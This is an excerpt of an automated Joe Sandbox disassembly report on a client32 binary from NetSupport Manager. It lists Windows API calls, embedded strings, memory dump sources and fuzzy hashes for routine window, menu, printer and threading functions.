                                                                                                                                                                • Opcode Fuzzy Hash: 3b29731f2fcac8cdf4188579606b588cad6f6aa37c3165fe8824c1b26f510daf
                                                                                                                                                                • Instruction Fuzzy Hash: 29411CB1604705ABD754CFA9DC80FA7B7A9AB88704F144918F96EC7244EB30B9048BA1
                                                                                                                                                                APIs
                                                                                                                                                                • SetPropA.USER32(?,?), ref: 1101556F
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 11015290: BeginPaint.USER32(?,?), ref: 110152BF
                                                                                                                                                                  • Part of subcall function 11015290: GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                                                                                                  • Part of subcall function 11015290: _memset.LIBCMT ref: 110152E5
                                                                                                                                                                  • Part of subcall function 11015290: CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                                                                                                  • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                                                                                                  • Part of subcall function 11015290: SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                                                                                                  • Part of subcall function 11015290: BeginPath.GDI32(00000000), ref: 1101532D
                                                                                                                                                                  • Part of subcall function 11015290: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                                                                                                  • Part of subcall function 11015290: EndPath.GDI32(00000000), ref: 11015357
                                                                                                                                                                  • Part of subcall function 11015290: PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                                                                                                  • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                                                                                                  • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                                                                                                  • Part of subcall function 11015290: CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                                                                                                  • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                                                                                                  • Part of subcall function 11015290: SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                                                                                                  • Part of subcall function 11015290: GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                                                                                                • GetPropA.USER32(?), ref: 1101557E
                                                                                                                                                                • wsprintfA.USER32 ref: 110155B3
                                                                                                                                                                • RemovePropA.USER32(?), ref: 110155E8
                                                                                                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 11015611
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                                                                                                • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                • API String ID: 1924375018-841114059
                                                                                                                                                                • Opcode ID: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                                                                                                • Instruction ID: fc00b609a2f261b647cf9ab1963ef075e81928135c8218ba30019119ab5d925d
                                                                                                                                                                • Opcode Fuzzy Hash: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                                                                                                • Instruction Fuzzy Hash: 1131E775E01029ABD714DFA4DC80FBEB379EF4A309F04406AF51A9F148EA7A9940CB71
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                                                                                                • _memset.LIBCMT ref: 110051C0
                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 2755257978-4108050209
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1101D1E0
                                                                                                                                                                • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                                                                                                • _memset.LIBCMT ref: 1101D20A
                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                                                                                                • String ID: NSMChatSizeWnd
                                                                                                                                                                • API String ID: 2883038198-4119039562
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1103D18F
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                                                                                                • String ID: /247$" /a$RunAnnot
                                                                                                                                                                • API String ID: 2581068044-4059077130
                                                                                                                                                                APIs
                                                                                                                                                                • _strncmp.LIBCMT ref: 110094BA
                                                                                                                                                                • _strncmp.LIBCMT ref: 110094CA
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,59FD48C0), ref: 1100956B
                                                                                                                                                                Strings
                                                                                                                                                                • http://, xrefs: 110094B5, 110094C8
                                                                                                                                                                • https://, xrefs: 110094AF
                                                                                                                                                                • IsA(), xrefs: 11009525, 1100954D
                                                                                                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 110094F1
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009520, 11009548
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncmp$FileWrite
                                                                                                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                • API String ID: 1635020204-3154135529
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(00000001,00000001,1102E392,00000001), ref: 111434D6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 111434E8
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11143524
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11143541
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Free$AddressErrorExitLastLoadMessageProcProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                                                                                                • API String ID: 2160193376-301070788
                                                                                                                                                                • Opcode ID: 2a8fc7a94a46caecedbed327bb066737295b455605f7211d1e2b0150595d0564
                                                                                                                                                                • Instruction ID: 6a29b7f029b91e0d2268b199c153ab63b6156163618a51e8f8cd3d343416273f
                                                                                                                                                                • Opcode Fuzzy Hash: 2a8fc7a94a46caecedbed327bb066737295b455605f7211d1e2b0150595d0564
                                                                                                                                                                • Instruction Fuzzy Hash: 50319375E0412A9BDB04DFA9E880BAEF7F4EF58719F10006EE919E7340DB71A9008B95
                                                                                                                                                                APIs
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 110BB675
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 110BB682
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 110BB685
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$Load
                                                                                                                                                                • String ID: *StartPage$*WindowPos$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$j CB::OnClose()
                                                                                                                                                                • API String ID: 1675784387-712237611
                                                                                                                                                                • Opcode ID: 1c6105e7932f0d056cf72b8fb5849ede38305ee900c17f807d9410f09db8cd81
                                                                                                                                                                • Instruction ID: 74c2bdc869b4bbdbbd78758767e6ba7e5d3ab86a6c16ffb7c9eb54b484d1c885
                                                                                                                                                                • Opcode Fuzzy Hash: 1c6105e7932f0d056cf72b8fb5849ede38305ee900c17f807d9410f09db8cd81
                                                                                                                                                                • Instruction Fuzzy Hash: 79219178B00A11AFD711EB29CC90F6AB3E5BF98708F104458E24647791CB75FD41CB99
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E011,?,?,11194244,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112B295
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112B2AE
                                                                                                                                                                • wsprintfA.USER32 ref: 1112B2FB
                                                                                                                                                                • wsprintfA.USER32 ref: 1112B313
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,1102E011), ref: 1112B328
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                                                                                                • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                                                                                                • API String ID: 435568443-4085816232
                                                                                                                                                                • Opcode ID: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                                                                                                • Instruction ID: 7d96227945af9bb0c0fa81f266df54215dce15e5fec16fb5673a6d202f8b9dc6
                                                                                                                                                                • Opcode Fuzzy Hash: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                                                                                                • Instruction Fuzzy Hash: 87216D75E001299BCB14CFA6CD85AEEFBB8FF8D614F550118EC14A3300E635AE05CBA4
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 11037267
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _free.LIBCMT ref: 1103728F
                                                                                                                                                                • _strncpy.LIBCMT ref: 110372BB
                                                                                                                                                                • _strncpy.LIBCMT ref: 110372F8
                                                                                                                                                                • _malloc.LIBCMT ref: 11037332
                                                                                                                                                                • _strncpy.LIBCMT ref: 11037343
                                                                                                                                                                • _strncpy.LIBCMT ref: 11037383
                                                                                                                                                                • _malloc.LIBCMT ref: 110373B6
                                                                                                                                                                • _strncpy.LIBCMT ref: 110373CC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1102513549-0
                                                                                                                                                                • Opcode ID: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                                                                                                • Instruction ID: 5b3f98012d02b14c7d353fffc6174d10c2b98c6782d71c8fdc241da8d4ec8af6
                                                                                                                                                                • Opcode Fuzzy Hash: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                                                                                                • Instruction Fuzzy Hash: 5A5152B5D04225AFDB20CF74CD84BCAFBECAF15348F004595998997240EBB5AA94CFE1
                                                                                                                                                                APIs
                                                                                                                                                                • IsDlgButtonChecked.USER32(?,0000046F), ref: 1104375A
                                                                                                                                                                • IsDlgButtonChecked.USER32(?,00000470), ref: 1104376D
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 110437F1
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 110437FA
                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1104380E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CursorDestroy$ButtonChecked
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2664327029-0
                                                                                                                                                                • Opcode ID: 3c7e2840943497a05b97604098b0971d67cbf230661a95a93ee622ec4e9ca818
                                                                                                                                                                • Instruction ID: 913a87f5d1f4dae196699e1681375fdf05d89e945816625d83c4ba874613c616
                                                                                                                                                                • Opcode Fuzzy Hash: 3c7e2840943497a05b97604098b0971d67cbf230661a95a93ee622ec4e9ca818
                                                                                                                                                                • Instruction Fuzzy Hash: CA31B2B9F08B1297F620CB75CCC0F57B3E9AF84714F214578AAA58BA80EA71F841C750
                                                                                                                                                                APIs
                                                                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,00000000), ref: 1106547F
                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 11065488
                                                                                                                                                                • GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 110654FC
                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 11065505
                                                                                                                                                                • _malloc.LIBCMT ref: 11065519
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,?,?,00000000,?), ref: 11065539
                                                                                                                                                                • _free.LIBCMT ref: 11065552
                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 1106555C
                                                                                                                                                                • ClosePrinter.WINSPOOL.DRV(?), ref: 11065569
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastPrinter$AllocateCloseHeapOpenPrinter._free_malloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2468972630-0
                                                                                                                                                                • Opcode ID: e189d58571a4b5224f95438dc2af4bc1d130a46c47aba880a9296071b596f7c6
                                                                                                                                                                • Instruction ID: dd18d64e5e53a4005563cb4be3982e78098f84f3bbcd64b56140ec8fa16c62fe
                                                                                                                                                                • Opcode Fuzzy Hash: e189d58571a4b5224f95438dc2af4bc1d130a46c47aba880a9296071b596f7c6
                                                                                                                                                                • Instruction Fuzzy Hash: 73311AB5D0135A5BDB20DFB49C98ADFF7BD9B04348F0045E8E519D7101EA32AE84CB51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F6C0: GetCurrentThreadId.KERNEL32 ref: 1110F6CE
                                                                                                                                                                  • Part of subcall function 1110F6C0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F0590,?,110CD565,00000000,76963760), ref: 1110F6D8
                                                                                                                                                                  • Part of subcall function 1110F6C0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD565,00000000,76963760), ref: 1110F6F8
                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                                                                • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                                                                • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                                                                                • IsDialogMessageA.USER32(00000000,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5CB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5E1
                                                                                                                                                                • DestroyWindow.USER32(00000000,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5F1
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5FB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD611
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1497311044-0
                                                                                                                                                                • Opcode ID: f20bf26288957c11d1734c83877ac0841ecd78f8789a4f1d65426f3f39527bf2
                                                                                                                                                                • Instruction ID: ce85479676fbbacf97f04baa4819853d041e927657626279fb9dfb9fd4669857
                                                                                                                                                                • Opcode Fuzzy Hash: f20bf26288957c11d1734c83877ac0841ecd78f8789a4f1d65426f3f39527bf2
                                                                                                                                                                • Instruction Fuzzy Hash: 7821A176B15219ABE710DF78DC88B9EB7E8EB4C725F1041A5F918D7280E771E9008BE0
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                                                                                • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                                                                                                • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                                                                                • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                                                                                                APIs
                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D56F
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D589
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D596
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5A3
                                                                                                                                                                • SetEvent.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5B5
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5BF
                                                                                                                                                                • SetEvent.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5D1
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5DB
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5E8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$Event$FileUnmapView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2427653990-0
                                                                                                                                                                • Opcode ID: ab6c90776147f09290a5f249941666f4232c26c70d1da2a2b111b21ea067ecfc
                                                                                                                                                                • Instruction ID: 305866375ee5fc950d06dd2839fb51b543f3d5a1eb7983ef4fa68e21372a5f05
                                                                                                                                                                • Opcode Fuzzy Hash: ab6c90776147f09290a5f249941666f4232c26c70d1da2a2b111b21ea067ecfc
                                                                                                                                                                • Instruction Fuzzy Hash: CF11EFB59407489BD720DFAAC8D481AFBF9AE583043514E7EE19AC3650C674E9489B50
                                                                                                                                                                APIs
                                                                                                                                                                • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                                                                                                • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                                                                                                • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                                                                                                • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                                                                                                • API ID: Object$Select$Stock$Clip$Brush
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2690518013-0
                                                                                                                                                                • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                                                                                • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                                                                                                • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                                                                                • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 11157646
